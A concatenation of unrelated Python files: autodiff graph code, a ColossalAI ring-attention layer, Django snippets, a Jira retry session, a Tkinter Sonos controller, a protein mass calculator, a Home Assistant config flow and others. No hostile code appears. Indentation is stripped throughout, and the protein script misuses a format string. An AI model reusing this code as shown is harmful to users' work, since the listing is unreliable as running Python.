info = NamedDebugInfo(prim=prim, name=prim.name)
bprop = clone(standard_parse(fn))
bprop.flags.update(default_grad_flags)
bprop.debug.name = None
bprop.debug.about = About(info, "grad_bprop") # type: ignore
if bprop.output.match(_is_raise):
pass
elif bprop.output.match(_is_mktuple_resolve) or bprop.output.match(
_is_mktuple_direct
):
bprop.output = bprop.apply(
P.make_tuple, newenv, *bprop.output.inputs[1:]
)
else:
raise InternalInferenceError(
f"The backpropagator for {prim} is not defined properly. "
f"It should return a tuple literal.",
refs=[bprop.return_],
)
*args, out_param, dout = bprop.parameters
with About(info, "grad_fprop"):
outer = Graph()
outer.flags.update(default_grad_flags)
outer.flags.update(flags)
outer.transforms["primal"] = prim
outer.output = Constant(None)
mng = manage(bprop, outer)
transf_args = []
for p in args:
with About(p.debug, "grad_fprop"):
outer_p = outer.add_parameter()
with About(p.debug, "equiv"):
transf_p = outer.apply(P.Jinv, outer_p)
mng.replace(p, transf_p)
transf_args.append(transf_p)
with About(out_param.debug, "equiv"):
out_value = outer.apply(prim, *transf_args)
mng.replace(out_param, out_value)
with About(out_param.debug, "grad_sens"):
new_dout = bprop.add_parameter()
mng.replace(dout, new_dout)
# We remove all parameters except new_dout
bprop.parameters = [new_dout]
result = outer.apply(P.J, out_value)
outer.output = outer.apply(P.make_tuple, result, bprop)
return clone(outer)
def wrap_grad_transform(prim):
"""Wrap the grad transform for prim."""
from .pipeline import standard_parse
def deco(fn):
g = standard_parse(fn)
for g2 in manage(g, weak=True).graphs:
name = short_labeler.name(g2)
name = name.replace("__fprop__", syms["grad_fprop"])
g2.debug.name = name.replace("__bprop__", syms["grad_bprop"])
g2.flags.update(default_grad_flags)
g.transforms["primal"] = prim
return g
return deco
def bprop_to_grad_transform(prim, **flags):
"""Create the grad transform of a function from a bprop function."""
def deco(fn):
return _make_grad_transform(prim, fn, flags)
return deco
__consolidate__ = True
__all__ = ["Jimpl", "bprop_to_grad_transform", "wrap_grad_transform"]
|
from torch2trt.torch2trt import *
from .ReLU import *
@tensorrt_converter('torch.nn.functional.relu')
def convert_relu(ctx):
ctx.method_args = (torch.nn.ReLU(),) + ctx.method_args
convert_ReLU(ctx) |
# coding=utf-8
import datetime
from django import template
register = template.Library()
@register.filter
def attr_from_domain_id(attrs, domain_id):
attrs = attrs.filter(domain_id=domain_id)
return attrs.first() if attrs else None
|
from unittest import TestCase, main
from requests.exceptions import Timeout
from unittest.mock import Mock, patch
from src.mytest.mocking.my_calendar import requests, protocol
from src.mytest.mocking.my_calendar import get_holidays
target_url = 'http://localhost/api/holidays'
def log_request(obj):
print(f"Making a request to {target_url}")
print(f"Request received!")
response_mock = Mock()
response_mock.status_code = 200
response_mock.json.return_value = {
'12/25': 'Christmas',
'5/5': "Children's Day"
}
return response_mock
class TestCalendar(TestCase):
@patch('src.mytest.mocking.my_calendar.requests')
def test_get_holidays_timeout(self, mock_requests):
mock_requests.get.side_effect = Timeout
with self.assertRaises(Timeout):
get_holidays()
def test_get_holidays_logging(self):
with patch('src.mytest.mocking.my_calendar.requests') as mock_requests:
holidays = {
'12/25': 'Christmas',
'5/5': "Children's Day"
}
def response_mock(args):
return Mock(**{'status_code': 200, 'json.return_value': holidays})
mock_requests.get.side_effect = response_mock
self.assertEqual(get_holidays()['12/25'], "Christmas")
self.assertEqual(mock_requests.get.call_count, 1)
@patch.object(requests, 'get', side_effect=[Timeout, log_request("any")])
def test_get_holiday_retry(self, mock_get):
with self.assertRaises(Timeout):
get_holidays()
self.assertEqual(get_holidays()['12/25'], "Christmas")
self.assertEqual(mock_get.call_count, 2)
@patch.object(requests, 'get', side_effect=["start", "busy", "completed", "idle"])
def test_protocol(self, mock_get):
protocol()
self.assertEqual(mock_get.call_count, 3)
if __name__ == '__main__':
main()
|
from django.http import HttpRequest, HttpResponse
from hermes.forms.models import Form, Site, Submission
from hermes.hooks.mail.email import render_submission_body
def debug_submission_email(request: HttpRequest, *args, **kwargs) -> HttpResponse:
(site, _) = Site.objects.get_or_create(
name="test site", url="https://example.com", user=request.user
)
(form, _) = Form.objects.get_or_create(name="test form", site=site)
submission = form.submission_set.first()
if submission is None:
submission = Submission.objects.create(
form=form, data={"name": "Testy", "message": "This is a test message"}
)
(_, body) = render_submission_body(submission=submission)
return HttpResponse(body.html)
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import math
import colossalai
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
from colossalai.context.parallel_mode import ParallelMode
from colossalai.core import global_context as gpc
from colossalai.nn.layer.parallel_sequence._operation import RingQK, RingAV
from colossalai.registry import LAYERS
from colossalai.kernel.cuda_native.scaled_softmax import AttnMaskType
from colossalai.kernel import FusedScaleMaskSoftmax
from colossalai.context import seed
@LAYERS.register_module
class TransformerSelfAttentionRing(nn.Module):
"""Parallel self-attention layer abstract class.
Self-attention layer takes input with size [b, s, h]
and returns output of the same size.
Args:
hidden_size (int): hidden size.
num_attention_heads (int): number of attention heads.
attention_dropout (float): dropout probability for attention layer.
attention_mask_func (:class:`typing.Callable`): Mask function to be applied.
layer_number (int): number of layers.
"""
def __init__(self,
hidden_size,
num_attention_heads,
attention_dropout,
attention_mask_func,
layer_number,
apply_query_key_layer_scaling: bool = False,
convert_fp16_to_fp32_in_softmax: bool = False,
attn_mask_type=AttnMaskType.padding,
masked_softmax_fusion=True,
fp16=False,
bf16=False
):
super().__init__()
self.convert_fp16_to_fp32_in_softmax = convert_fp16_to_fp32_in_softmax
self.apply_query_key_layer_scaling = apply_query_key_layer_scaling
self.attention_mask_func = attention_mask_func
self.layer_number = layer_number
self.hidden_size = hidden_size
self.num_attention_heads = num_attention_heads
self.attn_mask_type = attn_mask_type
assert self.layer_number > 0
self.attention_dropout = attention_dropout
if self.apply_query_key_layer_scaling:
self.convert_fp16_to_fp32_in_softmax = True
assert self.hidden_size % self.num_attention_heads == 0, \
'hidden size is not divisible by the number of attention heads'
self.hidden_size_per_attention_head = self.hidden_size // num_attention_heads
self.world_size = gpc.get_world_size(ParallelMode.SEQUENCE)
# Strided linear layer.
self.query_key_value = _Linear(
hidden_size,
3 * self.hidden_size,
)
self.coeff = None
self.norm_factor = math.sqrt(self.hidden_size)
if self.apply_query_key_layer_scaling:
self.coeff = layer_number
self.norm_factor *= self.coeff
self.scale_mask_softmax = FusedScaleMaskSoftmax(
fp16, bf16,
self.attn_mask_type,
masked_softmax_fusion,
self.attention_mask_func,
self.convert_fp16_to_fp32_in_softmax,
self.coeff)
self.attention_dropout = nn.Dropout(attention_dropout)
# Output.
self.dense = _Linear(hidden_size,
hidden_size,
bias=True,
skip_bias_add=True)
def forward(self, hidden_states, attention_mask):
# hidden_states: [sub_seq_len, batch_size, hidden_size]
# attention_mask: [batch_size, 1, sub_seq_len, seq_len]
sub_seq_length, batch_size, hidden_size = hidden_states.size()
# =====================
# Query, Key, and Value
# =====================
# Attention heads shape change:
# [sub_seq_len, batch_size, hidden_size] --> [sub_seq_len, batch_size, (3 * head_size * num_heads)]
mixed_x_layer = self.query_key_value(hidden_states)
# [sub_seq_len, batch_size, num_heads, 3 * head_size] --> 3 [sub_seq_len, batch_size, num_heads, head_size]
new_tensor_shape = mixed_x_layer.size()[:-1] + (self.num_attention_heads,
3 * self.hidden_size_per_attention_head)
mixed_x_layer = mixed_x_layer.view(*new_tensor_shape)
# split into query, key and value
last_dim = mixed_x_layer.dim() - 1
last_dim_value = mixed_x_layer.size(-1)
assert last_dim_value % 3 == 0, 'the last dimension is not a multiple of 3, ' \
'cannot be divided into query, key and value'
partition_size = last_dim_value // 3
(query_layer, key_layer, value_layer) = torch.split(
mixed_x_layer, partition_size, dim=last_dim)
# attention scores: [batch_size, num_heads, sub_seq_len, seq_len]
output_size = (query_layer.size(1),
query_layer.size(2),
query_layer.size(0),
key_layer.size(0) * self.world_size)
# [sub_seq_len, batch_size, num_heads, head_size] -> [sub_seq_len, batch_size * num_heads, head_size]
query_layer = query_layer.view(output_size[2],
output_size[0] * output_size[1], -1)
# [sub_seq_len, batch_size, num_heads, head_size] -> [sub_seq_len, batch_size * num_heads, head_size]
key_layer = key_layer.view(key_layer.size(0),
output_size[0] * output_size[1], -1)
# attention_scores: [batch_size * num_heads, sub_seq_len, seq_len]
attention_scores = RingQK.apply(
query_layer.transpose(0, 1).contiguous(), # [batch_size * num_heads, sub_seq_len, head_size]
key_layer.transpose(0, 1).contiguous(), # [batch_size * num_heads, sub_seq_len, head_size],
batch_size,
self.num_attention_heads,
sub_seq_length
)
attention_scores /= self.norm_factor
# change view to [batch_size, num_heads, sub_seq_len, seq_len]
attention_scores = attention_scores.view(*output_size)
# change shape to [batch_size, num_heads, sub_seq_len, seq_len]
attention_probs = self.scale_mask_softmax(attention_scores, attention_mask)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
with seed(ParallelMode.TENSOR):
attention_probs = self.attention_dropout(attention_probs)
# context layer shape: [batch_size, num_heads, sub_seq_len, head_size]
output_size = (value_layer.size(1),
value_layer.size(2),
query_layer.size(0),
value_layer.size(3))
# change view [sub_seq_len, batch_size * num_heads, head_size]
value_layer = value_layer.contiguous().view(value_layer.size(0),
output_size[0] * output_size[1], -1)
# # change view [b * num_heads, sub_seq_len, seq_len]
attention_probs = attention_probs.view(attention_probs.size(0) * attention_probs.size(1),
attention_probs.size(2),
attention_probs.size(3))
# matmul: [batch_size * num_heads, sub_seq_len, head_size]
context_layer = RingAV.apply(
attention_probs,
value_layer.transpose(0, 1).contiguous(),
batch_size,
self.num_attention_heads,
self.hidden_size_per_attention_head,
sub_seq_length
)
# change view [batch_size, num_heads, sub_seq_len, head_size]
context_layer = context_layer.view(*output_size)
# [batch_size, num_heads, sub_seq_len, head_size] -> [sub_seq_len, batch_size, num_heads, head_size]
context_layer = context_layer.permute(2, 0, 1, 3).contiguous()
# [sub_seq_len, batch_size, num_heads, head_size] -> [sub_seq_len, batch_size, hidden_size]
new_context_layer_shape = context_layer.size()[:-2] + (
self.hidden_size_per_attention_head * self.num_attention_heads,)
context_layer = context_layer.view(*new_context_layer_shape)
output, bias = self.dense(context_layer)
return output, bias
def __repr__(self):
return f'TransformerSelfAttentionRing(apply_query_key_layer_scaling={self.apply_query_key_layer_scaling}, ' \
f'layer_number={self.layer_number}, hidden_size:{self.hidden_size}, attention_dropout={self.attention_dropout}, ' \
f'attn_mask_type={self.attn_mask_type}, num_attention_heads={self.num_attention_heads}, ' \
f'hidden_size_per_attention_head={self.hidden_size_per_attention_head}, coeff={self.coeff}, norm_factor={self.norm_factor}, ' \
f'convert_fp16_to_fp32_in_softmax={self.convert_fp16_to_fp32_in_softmax})'
class _Linear(nn.Module):
"""Linear layer with column parallelism.
The linear layer is defined as Y = XA + b. A is parallelized along
its second dimension as A = [A_1, ..., A_p].
Arguments:
input_size: first dimension of matrix A.
output_size: second dimension of matrix A.
bias: If true, add bias
init_method: method to initialize weights. Note that bias is always set
to zero.
stride: For the strided linear layers.
keep_master_weight_for_test: This was added for testing and should be
set to False. It returns the master weights
used for initialization.
skip_bias_add: This was added to enable performance optimations where bias
can be fused with other elementwise operations. we skip
adding bias but instead return it.
"""
def __init__(self,
input_size,
output_size,
bias=True,
skip_bias_add=False):
super(_Linear, self).__init__()
# Keep input parameters
self.input_size = input_size
self.output_size = output_size
self.skip_bias_add = skip_bias_add
self.weight = Parameter(torch.empty(self.output_size,
self.input_size,
))
nn.init.xavier_normal_(self.weight)
if bias:
self.bias = Parameter(torch.empty(self.output_size))
# Always initialize bias to zero.
with torch.no_grad():
self.bias.zero_()
else:
self.register_parameter('bias', None)
def forward(self, input_):
# Matrix multiply.
bias = self.bias if not self.skip_bias_add else None
output = F.linear(input_, self.weight, bias)
if self.skip_bias_add:
return output, self.bias
else:
return output
def __repr__(self):
return f'Linear(in_features={self.input_size}, out_features={self.output_size}, ' + \
f'bias={self.bias is not None}, skip_bias_add={self.skip_bias_add})'
|
from setuptools import setup, find_namespace_packages
from tethys_apps.app_installation import find_resource_files
### Apps Definition ###
app_package = 'embalses'
release_package = 'tethysapp-' + app_package
# -- Get Resource File -- #
resource_files = find_resource_files('tethysapp/' + app_package + '/templates', 'tethysapp/' + app_package)
resource_files += find_resource_files('tethysapp/' + app_package + '/public', 'tethysapp/' + app_package)
resource_files += find_resource_files('tethysapp/' + app_package + '/workspaces', 'tethysapp/' + app_package)
### Python Dependencies ###
dependencies = []
setup(
name=release_package,
version='1.0.0',
description='An application for forecasting future reservoir levels in the Dominican Republic',
long_description='Uses the Streamflow Prediction Tool, user supplied water release information, and rule curves to '
'forecast the levels of any reservoir in the Domincan Republic. Developed in 2018 and 2019 by two '
'groups of BYU Civil Engineering Capstone students.',
keywords='Reservoir',
author='Riley Hales',
author_email='',
url='https://www.github.com/rileyhales/embalses',
license='MIT License',
packages=find_namespace_packages(),
package_data={'': resource_files},
include_package_data=True,
zip_safe=False,
install_requires=dependencies,
)
|
import json
import logging
import random
import time
from typing import Callable, Optional, Union, cast
from requests import Response, Session
from requests.exceptions import ConnectionError
from jira.exceptions import JIRAError
logging.getLogger("jira").addHandler(logging.NullHandler())
def raise_on_error(r: Optional[Response], verb="???", **kwargs):
"""Handle errors from a Jira Request
Args:
r (Optional[Response]): Response from Jira request
verb (Optional[str]): Request type, e.g. POST. Defaults to "???".
Raises:
JIRAError: If Response is None
JIRAError: for unhandled 400 status codes.
JIRAError: for unhandled 200 status codes.
"""
request = kwargs.get("request", None)
# headers = kwargs.get('headers', None)
if r is None:
raise JIRAError(None, **kwargs)
if r.status_code >= 400:
error = ""
if r.status_code == 403 and "x-authentication-denied-reason" in r.headers:
error = r.headers["x-authentication-denied-reason"]
elif r.text:
try:
response = json.loads(r.text)
if "message" in response:
# Jira 5.1 errors
error = response["message"]
elif "errorMessages" in response and len(response["errorMessages"]) > 0:
# Jira 5.0.x error messages sometimes come wrapped in this array
# Sometimes this is present but empty
errorMessages = response["errorMessages"]
if isinstance(errorMessages, (list, tuple)):
error = errorMessages[0]
else:
error = errorMessages
# Catching only 'errors' that are dict. See https://github.com/pycontribs/jira/issues/350
elif (
"errors" in response
and len(response["errors"]) > 0
and isinstance(response["errors"], dict)
):
# Jira 6.x error messages are found in this array.
error_list = response["errors"].values()
error = ", ".join(error_list)
else:
error = r.text
except ValueError:
error = r.text
raise JIRAError(
error,
status_code=r.status_code,
url=r.url,
request=request,
response=r,
**kwargs,
)
# for debugging weird errors on CI
if r.status_code not in [200, 201, 202, 204]:
raise JIRAError(
status_code=r.status_code, request=request, response=r, **kwargs
)
# testing for the bug exposed on
# https://answers.atlassian.com/questions/11457054/answers/11975162
if (
r.status_code == 200
and len(r.content) == 0
and "X-Seraph-LoginReason" in r.headers
and "AUTHENTICATED_FAILED" in r.headers["X-Seraph-LoginReason"]
):
pass
class ResilientSession(Session):
"""This class is supposed to retry requests that do return temporary errors.
At this moment it supports: 502, 503, 504
"""
def __init__(self, timeout=None):
self.max_retries = 3
self.max_retry_delay = 60
self.timeout = timeout
super().__init__()
# Indicate our preference for JSON to avoid https://bitbucket.org/bspeakmon/jira-python/issue/46 and https://jira.atlassian.com/browse/JRA-38551
self.headers.update({"Accept": "application/json,*.*;q=0.9"})
def __recoverable(
self,
response: Optional[Union[ConnectionError, Response]],
url: str,
request,
counter: int = 1,
):
msg = str(response)
if isinstance(response, ConnectionError):
logging.warning(
f"Got ConnectionError [{response}] errno:{response.errno} on {request} {url}\n{vars(response)}\n{response.__dict__}"
)
if isinstance(response, Response):
if response.status_code in [502, 503, 504, 401]:
# 401 UNAUTHORIZED still randomly returned by Atlassian Cloud as of 2017-01-16
msg = f"{response.status_code} {response.reason}"
# 2019-07-25: Disabled recovery for codes above^
return False
elif not (
response.status_code == 200
and len(response.content) == 0
and "X-Seraph-LoginReason" in response.headers
and "AUTHENTICATED_FAILED" in response.headers["X-Seraph-LoginReason"]
):
return False
else:
msg = "Atlassian's bug https://jira.atlassian.com/browse/JRA-41559"
# Exponential backoff with full jitter.
delay = min(self.max_retry_delay, 10 * 2**counter) * random.random()
logging.warning(
"Got recoverable error from %s %s, will retry [%s/%s] in %ss. Err: %s"
% (request, url, counter, self.max_retries, delay, msg)
)
if isinstance(response, Response):
logging.debug("response.headers: %s", response.headers)
logging.debug("response.body: %s", response.content)
time.sleep(delay)
return True
def __verb(
self, verb: str, url: str, retry_data: Callable = None, **kwargs
) -> Response:
d = self.headers.copy()
d.update(kwargs.get("headers", {}))
kwargs["headers"] = d
# if we pass a dictionary as the 'data' we assume we want to send json
# data
data = kwargs.get("data", {})
if isinstance(data, dict):
data = json.dumps(data)
retry_number = 0
exception = None
response = None
while retry_number <= self.max_retries:
response = None
exception = None
try:
method = getattr(super(), verb.lower())
response = method(url, timeout=self.timeout, **kwargs)
if response.status_code >= 200 and response.status_code <= 299:
return response
except ConnectionError as e:
logging.warning(f"{e} while doing {verb.upper()} {url}")
exception = e
retry_number += 1
if retry_number <= self.max_retries:
response_or_exception = response if response is not None else exception
if self.__recoverable(
response_or_exception, url, verb.upper(), retry_number
):
if retry_data:
# if data is a stream, we cannot just read again from it,
# retry_data() will give us a new stream with the data
kwargs["data"] = retry_data()
continue
else:
break
if exception is not None:
raise exception
raise_on_error(response, verb=verb, **kwargs)
# after raise_on_error, only Response objects are allowed through
response = cast(Response, response) # tell mypy only Response-like are here
return response
def get(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("GET", str(url), **kwargs)
def post(self, url: Union[str, bytes], data=None, json=None, **kwargs) -> Response: # type: ignore
return self.__verb("POST", str(url), data=data, json=json, **kwargs)
def put(self, url: Union[str, bytes], data=None, **kwargs) -> Response: # type: ignore
return self.__verb("PUT", str(url), data=data, **kwargs)
def delete(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("DELETE", str(url), **kwargs)
def head(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("HEAD", str(url), **kwargs)
def patch(self, url: Union[str, bytes], data=None, **kwargs) -> Response: # type: ignore
return self.__verb("PATCH", str(url), data=data, **kwargs)
def options(self, url: Union[str, bytes], **kwargs) -> Response: # type: ignore
return self.__verb("OPTIONS", str(url), **kwargs)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Sonos-GUI-URI
This is the first attempt to create a window to stream a URI to the Sonos Speakers.
Author: Jim Scherer
"""
import Tkinter as tk
import ttk
# from ttk import Frame, Style, Label, Button, Entry
import tkMessageBox as mbox
import time
import soco as sonosLib
class Example(ttk.Frame):
def __init__(self, parent):
ttk.Frame.__init__(self, parent)
self.parent = parent
self.lstSonos = list(sonosLib.discover())
self.sonos = self.lstSonos[0]
self.counter = 0
self.initUI()
def initUI(self):
self.parent.title("Sonos URI")
self.pack(fill=tk.BOTH, expand=1)
self.style = ttk.Style()
self.style.theme_use("default")
# Audio Contols
frame0 = ttk.Frame(self)
frame0.pack(fill=tk.BOTH)
self.btnMute = ttk.Button(frame0, text="Mute", width=6)
self.btnMute.pack(side=tk.LEFT, padx=2)
self.btnMute.bind('<Button-1>', self.onMute)
self.volume = tk.Scale(frame0, from_=0, to=100, orient=tk.HORIZONTAL, showvalue=0)
self.volume.pack(side=tk.LEFT, padx=2)
self.volume.bind('<ButtonRelease>', self.onSlide)
btnStop = ttk.Button(frame0, text="Stop", width=4)
btnStop.pack(side=tk.LEFT, padx=2)
btnStop.bind('<Button-1>', self.onStop)
self.btnPrev = ttk.Button(frame0, text="<< Prev", width=6)
self.btnPrev.pack(side=tk.LEFT, padx=(125,2))
self.btnPrev.bind('<Button-1>', self.onPrevious)
self.btnPlayPause = ttk.Button(frame0, text="?????", width=5)
self.btnPlayPause.pack(side=tk.LEFT, padx=2)
self.btnPlayPause.bind('<Button-1>', self.onPlayPause)
self.btnNext = ttk.Button(frame0, text="Next >>", width=6)
self.btnNext.pack(side=tk.LEFT, padx=2)
self.btnNext.bind('<Button-1>', self.onNext)
self.btnStatusLight = ttk.Button(frame0, text="Led Off", width=6)
self.btnStatusLight.pack(side=tk.RIGHT, padx=2)
self.btnStatusLight.bind('<Button-1>', self.onStatusLight)
self.lstSonosPlayerName = []
for i in self.lstSonos:
self.lstSonosPlayerName.append(i.player_name)
self.lstSonosPlayerName.sort()
self.varSonosPlayerName = tk.StringVar()
if 'Living Room' in self.lstSonosPlayerName:
self.sonos = filter(lambda speaker: speaker.player_name == 'Living Room', self.lstSonos)[0]
self.varSonosPlayerName.set(self.sonos.player_name)
self.dropSonosPlayerName = tk.OptionMenu(frame0,self.varSonosPlayerName,*self.lstSonosPlayerName, command=self.onDropSonos)
self.dropSonosPlayerName.config(width=14)
self.dropSonosPlayerName.pack(side=tk.RIGHT, padx=6)
# Audio Track Info
frameTrack = ttk.Frame(self)
frameTrack.pack(fill=tk.BOTH, pady=(10,3))
self.lblTrack = ttk.Label(frameTrack, text="Track")
self.lblTrack.pack(side=tk.LEFT)
frameArtist = ttk.Frame(self)
frameArtist.pack(fill=tk.BOTH, pady=3)
self.lblArtist = ttk.Label(frameArtist, text="Artist")
self.lblArtist.pack(side=tk.LEFT, padx=2, pady=2)
frameAlbum = ttk.Frame(self)
frameAlbum.pack(fill=tk.BOTH, pady=3)
self.lblAlbum = ttk.Label(frameAlbum, text="Album")
self.lblAlbum.pack(side=tk.LEFT, padx=2, pady=2)
# Frame
frame = ttk.Frame(self, relief=tk.RAISED, borderwidth=1)
frame.pack(fill=tk.BOTH, expand=True)
self.pack(fill=tk.BOTH, expand=True)
# Uri
self.btnZenCast = ttk.Button(frame, text="ZenCast")
self.btnZenCast.pack(side=tk.LEFT, padx=2)
self.btnZenCast.bind('<Button-1>', self.onZenCast)
self.lblUri = ttk.Label(frame, text="URI")
self.lblUri.pack(side=tk.LEFT, padx=2, pady=2)
self.entryUri = ttk.Entry(frame)
self.entryUri.pack(side=tk.LEFT, padx=2, fill=tk.X, expand=True)
self.btnSend = ttk.Button(frame, text="Send")
self.btnSend.pack(side=tk.RIGHT, padx=2)
self.btnSend.bind('<Button-1>', self.onSend)
frameMsg = ttk.Frame(self)
frameMsg.pack(fill=tk.BOTH)
self.lblStatus = ttk.Label(frameMsg, text="")
self.lblStatus.pack(side=tk.LEFT, padx=2, pady=2)
self.myUIRefresh()
# mbox.showinfo('Test Message', 'Got Here')
def onDropSonos(self, val):
pn = self.varSonosPlayerName.get()
for i in self.lstSonos:
if i.player_name == pn:
self.sonos = i
self.myUIRefresh()
break
def onSlide(self, val):
self.sonos.volume=self.volume.get()
def onMute(self, var):
self.sonos.mute = not self.sonos.mute
def onStatusLight(self, var):
self.sonos.status_light = not self.sonos.status_light
self.myStatusLight('refresh')
def onPrevious(self, var):
try:
self.sonos.previous()
self.myTrackInfo('refresh')
except sonosLib.exceptions.SoCoException:
self.btnPrev['state'] = 'disabled'
# mbox.showerror('Sonos Previous','You are on the first track')
def onNext(self, var):
try:
self.sonos.next()
self.myTrackInfo('refresh')
except sonosLib.exceptions.SoCoException:
self.btnNext['state'] = 'disabled'
# mbox.showerror('Sonos Next','You are on the last track')
def onZenCast(self, val):
audioUrl = 'http://traffic.libsyn.com/amberstar/Zencast' + self.entryUri.get() + '.mp3'
self.entryUri.delete(0, tk.END)
self.entryUri.insert(0, audioUrl)
self.onSend(audioUrl)
def onSend(self, val):
audioUrl = self.entryUri.get()
if urlExist(audioUrl):
self.sonos.play_uri(audioUrl)
self.myTrackInfo('refresh')
self.myPlayPause('pause')
self.entryUri.delete(0, tk.END)
else:
mbox.showerror('URI Error','URI '+ audioUrl + ' does not exist!' )
def onSelect(self, val):
sender = val.widget
idx = sender.curselection()
value = sender.get(idx)
self.varLb.set(value)
def onStop(self, var):
self.myPlayPause('stop')
def onPlayPause(self, val):
varCTS = self.myPlayPause('refresh')
if varCTS=='PLAYING':
self.myPlayPause('pause')
elif varCTS=='PAUSED_PLAYBACK':
self.myPlayPause('play')
elif varCTS=='STOPPED':
self.myPlayPause('play')
self.myPlayPause('refresh')
def myPlayPause(self, var):
if var == 'play':
self.sonos.play()
elif var == 'pause':
self.sonos.pause()
elif var == 'stop':
self.sonos.stop()
timeUntil = time.time() + 10
varCTS = self.sonos.get_current_transport_info()['current_transport_state']
while varCTS == 'TRANSITIONING' or varCTS == 'UNKNOWN':
self.lblStatus['text'] = varCTS + '.'
time.sleep(0.1)
varCTS = self.sonos.get_current_transport_info()['current_transport_state']
if timeUntil < time.time():
varCTS = 'TIMEOUT'
break
if varCTS=='TIMEOUT':
self.btnPlayPause['text'] = '?????'
elif varCTS=='PLAYING':
self.btnPlayPause['text'] = 'Pause'
elif varCTS=='PAUSED_PLAYBACK':
self.btnPlayPause['text'] = 'Play'
elif varCTS=='STOPPED':
self.btnPlayPause['text'] = 'Play'
self.lblStatus['text'] = varCTS
return varCTS
def myVolume(self, var):
if var == 'refresh':
self.volume.set(self.sonos.volume)
def myStatusLight(self, var):
if var == 'refresh':
self.btnStatusLight['text'] = 'LED Off' if self.sonos.status_light else 'LED On'
def myMute(self, var):
if var == 'refresh':
self.btnMute['text'] = 'Unmute' if self.sonos.mute else 'Mute'
def myTrackInfo(self, var):
track = self.sonos.get_current_track_info()
if var == 'refresh':
self.lblTrack['text'] = 'Track: ' + track['title']
self.lblArtist['text'] = 'Artist: ' + track['artist']
self.lblAlbum['text'] = 'Album: ' + track['album']
self.btnNext['state'] = 'normal'
self.btnPrev['state'] = 'normal'
def myUIRefresh(self):
self.myTrackInfo('refresh')
self.myVolume('refresh')
self.myMute('refresh')
self.myStatusLight('refresh')
self.myPlayPause('refresh')
import urllib2
def urlExist(url):
request = urllib2.Request(url)
request.get_method = lambda : 'HEAD'
try:
response = urllib2.urlopen(request)
return True
except:
return False
def main():
root = tk.Tk()
ex = Example(root)
root.geometry("900x350+300+300")
root.mainloop()
if __name__ == '__main__':
main()
|
from django.contrib import admin
from security.models import PasswordExpiry, CspReport
admin.site.register(PasswordExpiry)
admin.site.register(CspReport)
|
Full_length = input("Enter the sequence of your protein, in single letter code, here: ")
protein = Full_length.upper()
dict = {
'G' : 57.052,
'A' : 71.079,
'S' : 87.078,
'P' : 97.117,
'V' : 99.133,
'T' : 101.105,
'C' : 103.144,
'I' : 113.160,
'L' : 113.160,
'N' : 114.104,
'D' : 115.089,
'Q' : 128.131,
'K' : 128.174,
'E' : 129.116,
'M' : 131.198,
'H' : 137.142,
'F' : 147.177,
'R' : 156.188,
'Y' : 163.170,
'W' : 186.213
}
unknown = []
for id in range (0, len(protein)):
residue = protein[id]
if not (residue in dict):
unknown.append(id+1)
if len(unknown)>0:
print("Unrecognized amino acid at the indicated positions: {}".format(unknown))
while True:
try:
fragment = float(input("Enter the mass (in Da) of your fragment here: "))
except ValueError:
print("Fragment must be a number indicating the size of your fragment in Da. Please enter a number.")
else:
break
while True:
try:
Error_margin = float(input("Enter an error margin (in Da) here: "))
except ValueError:
print("The margin of error has to be a number (in Da). Please enter a number.")
else:
break
fragment -= 18
def alpha():
for i in range(0, len(protein)):
character = protein[i]
if character in dict:
def mass_spec():
list = []
start_point = 0
while start_point < len(protein):
total = 0
sequence = ""
for char in protein[start_point:]:
total += dict[char]
sequence += char
if total > fragment + Error_margin:
break
elif total < fragment - Error_margin:
continue
else:
list.append(sequence)
start_point += 1
if len(list) > 0:
return (list)
else:
return ("No match found. Please increase the margin of error.")
return (mass_spec())
else:
return ("The amino acid at position '%' is invalid".format(i+1))
print(alpha())
|
"""Config flow for AMD GPU integration."""
import logging
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from . import find_resources_in_config_entry
from .const import (
CONF_RESOURCES,
DOMAIN,
SENSOR_TYPES,
)
_LOGGER = logging.getLogger(__name__)
def _resource_schema_base(available_resources, selected_resources):
"""Resource selection schema."""
known_available_resources = {
sensor_id: sensor[0]
for sensor_id, sensor in SENSOR_TYPES.items()
if sensor_id in available_resources
}
return {
vol.Required(CONF_RESOURCES, default=selected_resources): cv.multi_select(
known_available_resources
)
}
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow for AMD GPU."""
def __init__(self):
self.gpu_config = {}
self.available_resources = SENSOR_TYPES.keys()
async def async_step_user(self, user_input=None):
"""Invoked when a user initiates a flow via the user interface."""
if self._async_current_entries():
return self.async_abort(reason="single_instance_allowed")
if user_input is None:
return self.async_show_form(
step_id="user",
data_schema=vol.Schema(
_resource_schema_base(self.available_resources, [])
),
)
self.gpu_config.update(user_input)
return self.async_create_entry(title=DOMAIN, data=self.gpu_config)
@staticmethod
@callback
def async_get_options_flow(config_entry):
"""Get the options flow for this handler."""
return OptionsFlowHandler(config_entry)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Invoked when a user reconfigures via the user interface."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
self.config_entry = config_entry
self.available_resources = SENSOR_TYPES.keys()
async def async_step_init(self, user_input=None):
"""Manage the options."""
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
resources = find_resources_in_config_entry(self.config_entry)
base_schema = _resource_schema_base(self.available_resources, resources)
return self.async_show_form(step_id="init", data_schema=vol.Schema(base_schema))
|
from django import forms
class UrbanAcroForm(forms.Form):
name = forms.CharField(required=True)
address = forms.CharField(required=True)
phone = forms.CharField(required=True)
email = forms.EmailField(required=True)
option = forms.CharField(required=False)
comment = forms.CharField(required=False)
class WinterAcroForm(forms.Form):
name = forms.CharField(required=False)
address = forms.CharField(required=False)
phone = forms.CharField(required=False)
email = forms.CharField(required=False)
option = forms.CharField(required=False)
allergies = forms.CharField(required=False)
donation = forms.CharField(required=False)
date = forms.DateField(required=False)
|
import base64
import os
mpesa_express_business_shortcode = os.getenv(
"MPESA_EXPRESS_BUSINESS_SHORTCODE")
